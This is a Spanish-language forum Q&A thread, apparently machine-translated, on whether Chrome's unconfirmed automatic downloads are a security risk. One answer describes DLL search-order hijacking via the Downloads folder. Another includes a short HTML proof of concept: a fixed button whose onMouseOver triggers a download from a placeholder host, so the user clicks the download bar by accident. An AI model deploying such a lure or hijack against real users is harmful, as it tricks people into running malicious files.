¿La falta de un cuadro de diálogo de confirmación de descarga de Google Chrome podría ser una vulnerabilidad de seguridad?

Sí, puede ser una vulnerabilidad de seguridad. Para explotarlo, considere el siguiente escenario.

1. El atacante de alguna manera convence al usuario de que visite un sitio web bajo el control de los atacantes.
2. Se descarga automáticamente una DLL en la carpeta de Descargas.
3. El usuario descarga un instalador / configuración legítimo / lo que sea en la carpeta de Descargas.
4. Es posible que este software sea vulnerable a Secuestro de orden de carga DLL .
5. Cuando el usuario inicie la aplicación legítima, básicamente cargará la DLL maliciosa dentro de la carpeta de Descargas en lugar de la legítima.

Afortunadamente, este no es un escenario muy probable, ya que hay muchas incógnitas / ifs en este ataque. ¿Puede el atacante adivinar qué otros archivos legítimos descarga el usuario? ¿Es posible secuestrar los archivos DLL en este software? ¿La DLL maliciosa será bloqueada por el escaneo de descarga de Chrome? Pero si el atacante tiene suerte, incluso es posible elevar los privilegios a admin porque los instaladores generalmente comienzan con privilegios de administrador, y los usuarios generalmente aceptan esta solicitud de UAC válida.

El escenario propuesto originalmente es menos probable, ya que la gente generalmente no inicia ejecutables desconocidos desde la carpeta de Descargas. Pero algunas personas lo harán con seguridad.

No estoy seguro de que esto pueda llamarse realmente una vulnerabilidad ... Sin embargo, este comportamiento podría no ser deseado.

Me imagino una posible vulnerabilidad como esta:

• El usuario está en un sitio web
• Haga que el usuario haga clic en un botón en la parte inferior izquierda de la pantalla (fije la posición del botón para que nunca cambie su posición en la pantalla)
• Tan pronto como el usuario tenga el mouse sobre el botón (onMouseOver) inicie la descarga de un archivo ejecutable
• La barra de descarga de Chrome aparece y el archivo descargado está ahora donde estaba el botón
• Si el usuario presiona el botón del mouse, podría abrir accidentalmente el archivo descargado (si ya está completamente descargado).

Depende del sistema operativo si el archivo descargado se ejecuta directamente o si presenta otra advertencia al usuario.

He construido un pequeño ejemplo. Esto supone que download.example.com inicia automáticamente una descarga. Y si no eres muy rápido haciendo clic, entonces funciona y acabas de abrir un archivo (tal vez malicioso).

<html>
 <body>
  <button type="button"
    onMouseOver="window.location.assign('http://download.example.com/')"
    style="position: fixed; bottom: 1em; left: 1em;">Click Me!</button>
 </body>
</html>

ElnavegadorFirefoxprevienedichosataquesdeformapredeterminadaalagregarunretrasoenelbotóndedescarga(vealapregunta ¿El retraso en el botón de guardado en un diálogo de descarga de Firefox es una característica de seguridad? )

Esto no es un problema de seguridad en Chrome. Esto es más un error que un usuario puede cometer.
Para que tu "ataque" funcione, necesitas los siguientes pasos:
1. Consigue un usuario para colocar tu juego
2. Descargue un archivo sin que el usuario lo note. 3. Haz que haga clic lo suficientemente cerca de la barra de descarga inferior 4. Supongamos que cometió un error e hizo clic en el archivo descargado

La posibilidad de que esto suceda de cualquier manera es muy baja. Si sucede, es 100% culpa de los usuarios y no de cromos.